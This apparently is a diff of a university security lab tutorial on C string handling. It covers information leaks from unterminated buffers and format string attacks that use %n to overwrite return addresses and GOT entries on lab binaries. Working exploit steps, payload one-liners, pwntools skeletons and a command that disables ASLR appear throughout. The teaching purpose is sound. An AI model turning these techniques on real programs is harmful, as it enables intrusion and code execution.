stack_items + b"\n" -  -io = process(["./format", fmt]) -  -io.interactive() -``` - -Then call the `format` using: - -```console -$ python exploit.py -``` - -One idea is to keep things in multiple of 4, like "%08x \\n". 
-If you are looking at line `175` we have `44434241` which is the base 16 representation of `"ABCD"` (because it's little endian). -Note, you can add as many format strings as you want, the start of the buffer will be the same (more or less). - -We can compress our buffer by specifying the position of the argument. - -```console -$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') -ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 -This is the most useless and insecure program! -``` - -`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. - -You can see that the last piece of output is our `b"ABCD"` string printed with `%08x`; this means that we know where our buffer is. - -You need to enable core dumps in order to reproduce the steps below: - -```console -$ ulimit -c unlimited -``` - -The steps below work on a given version of libc and a given system. -That is why the instruction that causes the fault is - -```asm -mov %edx,(%eax) -``` - -or the equivalent in Intel syntax - -```asm -mov DWORD PTR [eax], edx -``` - -It may be different on your system, for example `edx` may be replaced by `esi`, such as - -```asm -mov DWORD PTR [eax], esi -``` - -Update the explanations below accordingly. - -Remove any core files you may have generated before testing your program: - -```console -rm -f core -``` - -We can replace `%08x` with `%n`; this should lead to a segmentation fault. - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" -Segmentation fault (core dumped) - -$ gdb ./format -c core -... -Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. -Program terminated with signal 11, Segmentation fault.
-#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -(gdb) bt -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 -#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 -(gdb) x/i $eip -=> 0xf7e580a2 : mov %edx,(%eax) -(gdb) info registers $edx $eax -edx 0x202 1596 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Bingo. -We have memory write. -The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. -The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). - -Right now, our input string has 1605 bytes (1604 with a `n` at the end). -But we can further compress it, thus making the value that we write independent of the length of the input. - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" -Segmentation fault (core dumped) - -$ gdb ./format -c core -(gdb) info registers $edx $eax -edx 0x261 1691 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Here we managed to write `1691` (`4+1588+99`). -Note we should keep the number of bytes before the format string the same. -Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. -You can try this by yourself. - -**How far can we go?** -Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. 255 should be enough. - -Remember, we want to write a value to a certain address. -So far we control the address, but the value is somewhat limited. -If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. - -Lets first display the address. 
-We are using the address `0x804c014`. -This address is the address of the got entry for the puts function. -Basically, we will override the got entry for the puts. - -Check the `exploit.py` script from the task directory, read the commends and understand what it does. - -```console -$ python exploit.py -[*] 'format' - Arch: i386-32-little - RELRO: Partial RELRO - Stack: No canary found - NX: NX enabled - PIE: No PIE (0x8048000) -[+] Starting local process './format': pid 29030 -[*] Switching to interactive mode -[*] Process './format' stopped with exit code 0 (pid 29030) -\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... -This is the most useless and insecure program! -``` - -The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. - -If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. - -We want to put the value `0x080491a6`. - -```console -$ objdump -d ./format | grep my_evil -080491a6 : -``` - -As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. -We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. -For example, after writing `0xa6` we can write `0x0191`: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) - -Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. - -As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. - -**Bonus task** Can you get a shell? 
-(Assume ASLR is disabled). - -#### Mitigation and Recommendations - -1. Manage the string length carefully -1. Don't use `gets`. - With `gets` there is no way of knowing how much data was read -1. Use string functions with `n` parameter, whenever a non constant string is involved. i.e. `strnprintf`, `strncat`. -1. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. -1. Use `wcstr*` functions when dealing with wide char strings. -1. Don't trust the user! - -#### Real life Examples - -- [Heartbleed](http://xkcd.com/1354/) - Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) - The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2). - More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). - -- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) - -- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). - The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1) - -### Resources - -- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) -- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) -- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) -- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) -- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) -- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) -- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems. +# Information Leaks + +## Introduction + +#### Objectives & Rationale + +This is a tutorial based lab. 
+Throughout this lab you will learn about frequent errors that occur when handling strings. +This tutorial is focused on the C language. +Generally, OOP languages (like Java, C#, C++) use classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. + +#### What is a String? + +Conceptually, a string is a sequence of characters. +A string can be represented in multiple ways. +One way is to represent a string as a contiguous memory buffer. +Each character is **encoded** in some way. +For example, the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte. + +The type for representing an ASCII character in C is `char` and it uses one byte. +As a side note, `sizeof(char) == 1` is the only size guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. + +Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). +The idea is that in order to represent a Unicode string, **more than one** byte may be needed for **one** character. +`char16_t` and `char32_t` were introduced in the C standard to represent these strings. +The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. + +Our tutorial will focus on ASCII strings, where each character is represented in one byte. +We will show a few examples of what happens when one calls *string manipulation functions* that assume a specific encoding of the string. + +You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). 
+ +Inside an Unix terminal issue the command + +```console +man ascii +``` + +### Length Management + +In C, the length of an ASCII string is given by its contents. +An ASCII string ends with a `0` value byte called the `NUL` byte. +Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. +As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. + +### 1. Basic Info Leak (tutorial) + + +Enter the `01-basic-info-leak/` subfolder. +It's a basic information leak example. + +In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. +We should be careful with this buffer. +If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). +Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. +After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. +This information is copied into `my_string`. +As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. + +We can test this using: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� +``` + +In order to check the hexadecimal values of the leak, we pipe the output +through `xxd`: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak | xxd +00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: d066 57b4 fc7f 0a .fW.... 
+``` + +We have leaked one value above: + +- the lower non-zero bytes of the old/stored `rbp` value (right after the buffer) +- `0x7ffcb45766d0` (it's a little endian architecture); + it will differ on your system + +The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). +But assuming ASLR is enabled, the `rbp` value changes at each run. +If we leak it we have a base address that we can use to leak or overwrite other values. + +### 2. Information Leak + +We will now show how improper string handling leads to information leaks from memory. +For this, please access the `02-info-leak/` subfolder. +Please browse the `info-leak.c` source code file. + +The relevant code is shown below. +The goal is to call the `my_evil_func()` function. +One of the building blocks of exploiting a vulnerability is to see whether or not we have a memory write. +If you have a memory write, then getting code execution is a matter of getting things right. +In this task we are assuming that we have a memory write (i.e. we can write any value at any address). +You can call the `my_evil_func()` function by overwriting the return address of the `my_main()` function: + +```c +#define NAME_SZ 32 +  +static void read_name(char *name) +{ + memset(name, 0, NAME_SZ); + read(0, name, NAME_SZ); + //name[NAME_SZ-1] = 0; +} +  +static void my_main(void) +{ + char name[NAME_SZ]; +  + read_name(name); + printf("hello %s, what address to modify and with what value?\n", name); + fflush(stdout); + my_memory_write(); + printf("Returning from main!\n"); +} +``` + +What catches our eye is that the `read()` function call in the `read_name()` function reads up to `32` bytes, **exactly** the size of the `name` buffer. +If we provide it `32` bytes, the buffer won't be null-terminated, which results in an information leak when `printf()` is called in the `my_main()` function. 
+ +#### Exploiting the Memory Write Using the Info Leak + +Let's first try to see how the program works: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak +hello AAAAAAAAAA, what address to modify and with what value? +``` + +The binary wants an input from the user using the `read()` library call as we can see below: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak +read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 +read(0, "AAAAAAAAAA", 32) = 10 +hello AAAAAAAAAA, what address to modify and with what value? +read(0, "", 4) = 0 ++++ exited with 255 +++ +``` + +The input is read using the `read()` system call. +The first read expects 32 bytes. +You can see already that there's another `read()` call. +That one is the first `read()` call in the `my_memory_write()` function. + +As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. +Let's see how that goes: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak +hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? +  +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd +00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo +00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh +00000050: 6174 2076 616c 7565 3f0a at value?. +``` + +We see we have an information leak. +We leak one piece of data above: `0x7fffffffdcf0`. 
+If we run the program multiple times we can see that the leaked value differs between runs: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +``` + +The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. +We want to look more carefully using GDB and figure out what the variable value represents: + +```console +$ gdb -q ./info_leak +Reading symbols from ./info_leak...done. +gdb-peda$ b my_main +Breakpoint 1 at 0x400560 +gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') +Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') +[...] +  +# Do next instructions until after the call to printf. +gdb-peda$ ni +.... +  +gdb-peda$ x/12g name +0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa +gdb-peda$ x/2i 0x004007aa + 0x4007aa : mov edi,0x4008bc + 0x4007af : call 0x400550 +gdb-peda$ pdis main +Dump of assembler code for function main: + 0x00000000004007a1 <+0>: push rbp + 0x00000000004007a2 <+1>: mov rbp,rsp + 0x00000000004007a5 <+4>: call 0x400756 + 0x00000000004007aa <+9>: mov edi,0x4008bc + 0x00000000004007af <+14>: call 0x400550 + 0x00000000004007b4 <+19>: mov eax,0x0 + 0x00000000004007b9 <+24>: pop rbp + 0x00000000004007ba <+25>: ret +End of assembler dump. +gdb-peda$ +``` + +From the GDB output above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). + +In a 32-bit program there would (usually) be 2 leaked values: + +1. The old `ebp` +1. The return address of the function + +This happens if the values of the old `ebp` and the return address don't contain any `\x00` bytes. 
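Why a leak stops where it does can be sketched in a few lines of Python. This is an illustration only, not part of the lab: `c_string_at` is a hypothetical helper that mimics how `printf("%s")` reads bytes until the first `NUL`, the 64-bit stack contents are the ones from the GDB session above, and the 32-bit values are made up for the example.

```python
import struct


def c_string_at(memory: bytes, offset: int = 0) -> bytes:
    """Return what a C string function would read: bytes up to the first NUL."""
    end = memory.find(b"\x00", offset)
    return memory[offset:] if end == -1 else memory[offset:end]


name = b"A" * 32  # buffer completely filled, so it has no NUL terminator

# 64-bit frame from the GDB session: stored rbp, then the return address.
stack64 = name + struct.pack("<QQ", 0x00007FFFFFFFDC50, 0x00000000004007AA)
leak64 = c_string_at(stack64)[len(name):]
print(leak64.hex())  # 50dcffffff7f

# Hypothetical 32-bit frame (assumed values) with no zero byte in either word.
stack32 = name + struct.pack("<II", 0xFFFFD2F8, 0x080491C9) + b"\x00"
leak32 = c_string_at(stack32)[len(name):]
print(len(leak32))  # 8
```

In the 64-bit case the read ends after six bytes, at the first zero byte of the stored `rbp`, so the return address is never reached; in the assumed 32-bit case both 4-byte values are read.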
+ +In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0`, which causes the string to be terminated early. + +From the leak we are able to retrieve the stored `rbp` value. +In the above run the value of the stored `rbp` is `0x00007fffffffdc50`. +We also see that the stored `rbp` value is located at **address** `0x7fffffffdc40`, which is the address held in the current `rbp`. +We have the situation in the diagram below: + +![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) + +We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. + +In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. +The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. +By overwriting the value at this address we will hijack the control flow and call `my_evil_func()`. + +In order to overwrite the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) placed `my_memory_write()` function. +The `my_memory_write()` function allows the user to write arbitrary values to arbitrary memory addresses. + +Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. + +Use `nm` to determine the address of the `my_evil_func()` function. +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). 
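The address arithmetic described above can be sketched in plain Python. This is a minimal illustration and not the lab's `exploit.py`: the `leak` bytes are the six bytes seen in the GDB run, the standard `struct` module stands in for the pwntools `unpack()` helper, and the offsets `16` and `8` are the ones observed for this particular stack layout.

```python
import struct

# Six leaked bytes of the stored rbp, in little-endian order (from the GDB run).
leak = bytes.fromhex("50dcffffff7f")

# Pad with the two missing zero bytes, then unpack as a 64-bit little-endian value.
old_rbp = struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]

my_main_rbp = old_rbp - 16    # frame pointer of my_main()
ret_addr_slot = old_rbp - 8   # address where my_main()'s return address is stored

print(hex(old_rbp))        # 0x7fffffffdc50
print(hex(my_main_rbp))    # 0x7fffffffdc40
print(hex(ret_addr_slot))  # 0x7fffffffdc48
```

The last value is the address that would be handed to `my_memory_write()`, together with the address of `my_evil_func()` as the value to write.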
+ +Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. + +See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. + +In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: + +```console +$ python exploit.py +[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead +[+] Starting local process './info_leak': pid 6422 +[*] old_rbp is 0x7fffffffdd40 +[*] return address is located at is 0x7fffffffdd38 +[*] Switching to interactive mode +Returning from main! +$ id +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) +``` + +The rule of thumb is: **Always know your string length.** + +#### Format String Attacks + +We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. + +Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. + +The definition of `printf`: + +```c +int printf(const char *format, ...); +``` + +Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): + +- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address +- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). +This format is not widely used but it is in the C standard. 
+- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls `printf` (or another format string function) directly with a string controlled by the user. + +### Example 2 + +```c +printf(my_string); +``` + +The above snippet is a good example of why ignoring compile-time warnings is dangerous. +The given example is easily detected by a static checker. + +Try to think about: + +- The peculiarities of `printf` (variable number of arguments) +- Where `printf` stores its arguments (*hint*: on the stack) +- What happens when `my_string` is `"%x"` +- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers +- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) + +### Example 3 + +We would like to check some of the well-known and not-so-well-known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). +Some of them may be used for information leaking and for attacks such as format string attacks. + +Go into the `printf-features/` subfolder and browse the `printf-features.c` file. +Compile the executable file using: + +```console +make +``` + +and then run the resulting executable file using + +```console +./printf-features +``` + +Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. +We will make use of the `%n` feature that allows memory writes, a requirement for attacks. + +### Basic Format String Attack + +You will now do a basic format string attack using the `03-basic-format-string/` subfolder. +The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. 
+ +You need to use `%n` to overwrite the value of the `v` variable to `0x300`. +You have to do three steps: + +1. Determine the address of the `v` variable using `nm`. + +1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. +The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. + +1. Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. + + +For the second step let's run the program multiple times and figure out where the `buffer` address starts. +We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. + +```console +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 +``` + +In the last run we get the `4141414141414141` representation of `AAAAAAAA`. 
+That means that, if we replace the final `%llx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: + +```console +$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c +162 +``` + +We need that number to be `0x300`. +You can fine-tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. +See how much extra room you need and see if you reach `0x300` bytes. + +The construct needn't use a multiple of `8` for length. +You may use `%32llx`, `%33llx` or `%42llx`. +The numeric argument states the minimum width of the printed output. + +After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. + +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +After you write `0x300` into `v`, you should obtain a shell: + +```console +$ python exploit64.py +[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead +[+] Starting local process './basic_format_string': pid 20785 +[*] Switching to interactive mode + 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 +$ +``` + +### Extra: Format String Attack + +Go to the `04-format-string/` subfolder. +In this task you will be working with a **32-bit binary**. + +The goal of this task is to call `my_evil_func` again. +This task is also tutorial based. 
+ +```c +int main(int argc, char *argv[]) +{ + printf(argv[1]); + printf("\nThis is the most useless and insecure program!\n"); + return 0; +} +``` + +#### Transform Format String Attack to a Memory Write + +Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. + +```console +$ ./format "%08x %08x %08x %08x" +00000000 f759d4d3 00000002 ffd59bd4 +This is the most useless and insecure program! +``` + +The values starting with 0xf are very likely pointers. +Again, we can use this vulnerability as an information leak. +But we want more. + +Another useful format for us is `%m$` followed by any normal format selector. +It means that the `m`th parameter is used as the input for the following format: `%10$08x` will print the `10`th parameter with `%08x`. +This allows us to access the stack precisely. + +Example: + +```console +$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" +00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +This is the most useless and insecure program! +``` + +Note the equivalence between formats. +Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. + +```console +$ ./format "$(python -c 'print("%08x\n" * 10000)')" +``` + +Depending on your setup you should be able to view the hex +representation of the string "%08x\\n". + +**Why do we need our own buffer?** +Remember the `%n` format? +It can be used to write at an address given as a parameter. +The idea is to give this address as a parameter and achieve a memory write. +We will see later how to control the value. + +The next steps are done with ASLR disabled. 
+In order to disable ASLR, please run: + +```console +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head +10: ffffc410 +52: ffffcc41 +72: ffffcf41 +175: 44434241 +``` + +Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. +You can use the following reference pwntools script to write your exploit. +The code is equivalent to the above one-liner. + +```python +#!/usr/bin/env python3 +  +from pwn import * +  +stack_items = 200 +  +pad = b"ABCD" +val_fmt = b"%08x\n " +# add a \n at the end for consistency with the command line run +fmt = pad + val_fmt * stack_items + b"\n" +  +io = process(["./format", fmt]) +  +io.interactive() +``` + +Then call the `format` using: + +```console +$ python exploit.py +``` + +One idea is to keep things in multiple of 4, like "%08x \\n". +If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it's little endian). +Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). + +We can compress our buffer by specifying the position of the argument. + +```console +$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') +ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 +This is the most useless and insecure program! +``` + +`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. + +You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. 
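To double-check the little-endian reading of `44434241`, and to see how a positional probe like the one above can be assembled, here is a small sketch. `build_probe` is a hypothetical helper, not part of the task files; the argument index `175` and the filler count `199` are the values observed in this run and will likely differ on other systems.

```python
import struct

# "%08x" printed the 32-bit word 0x44434241; in memory it is stored little endian.
word = int("44434241", 16)
print(struct.pack("<I", word))  # b'ABCD'


def build_probe(marker: bytes, filler_count: int, position: int) -> bytes:
    """Marker, fixed-size filler, then a positional %08x for the given argument index."""
    return marker + b"AAAAAAAA" * filler_count + b"%%%d$08x" % position


payload = build_probe(b"ABCD", 199, 175)
print(len(payload))   # 1604
print(payload[-8:])   # b'%175$08x'
```

Keeping the filler size fixed is what keeps the argument index stable while the trailing format specifier is changed.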
+ +You need to enable core dumps in order to reproduce the steps below: + +```console +$ ulimit -c unlimited +``` + +The steps below were run on a specific version of libc and a specific system. +That is why the instruction that causes the fault is + +```asm +mov %edx,(%eax) +``` + +or the equivalent in Intel syntax + +```asm +mov DWORD PTR [eax], edx +``` + +It may be different on your system, for example `edx` may be replaced by `esi`, such as + +```asm +mov DWORD PTR [eax], esi +``` + +Update the explanations below accordingly. + +Remove any core files you may have generated before testing your program: + +```console +rm -f core +``` + +We can replace `%08x` with `%n`; this should lead to a segmentation fault. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +... +Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. +Program terminated with signal 11, Segmentation fault. +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +(gdb) bt +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 +#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 +(gdb) x/i $eip +=> 0xf7e580a2 : mov %edx,(%eax) +(gdb) info registers $edx $eax +edx 0x202 1596 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Bingo. +We have a memory write. +The vulnerable code tried to write the value 1596 at the address `0x44434241` ("ABCD" little endian). +The value 1596 is the amount of data written so far by `printf` (`"ABCD" + 199 * "AAAAAAAA"`). + +Right now, our input string has 1604 bytes (1605 with a `\n` at the end). +But we can further compress it, thus making the value that we write independent of the length of the input. 
+ +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"A" * 1588 + b"%99x" + b"%126$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +(gdb) info registers $edx $eax +edx 0x261 1691 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Here we managed to write `1691` (`4+1588+99`). +Note that we should keep the number of bytes before the format string the same, which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. +You can try this by yourself. + +**How far can we go?** +We can probably use any integer as the field width of a format, but we don't need to; moreover, a very large padding is not always feasible (think of what happens when printing with `snprintf`). 255 should be enough. + +Remember, we want to write a value to a certain address. +So far we control the address, but the value is somewhat limited. +To write a full 4-byte value we can make use of the endianness of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. + +Let's first display the address. +We are using the address `0x804c014`. +This address is the address of the GOT entry for the `puts` function. +Basically, we will overwrite the GOT entry for `puts`. + +Check the `exploit.py` script from the task directory, read the comments and understand what it does. + +```console +$ python exploit.py +[*] 'format' + Arch: i386-32-little + RELRO: Partial RELRO + Stack: No canary found + NX: NX enabled + PIE: No 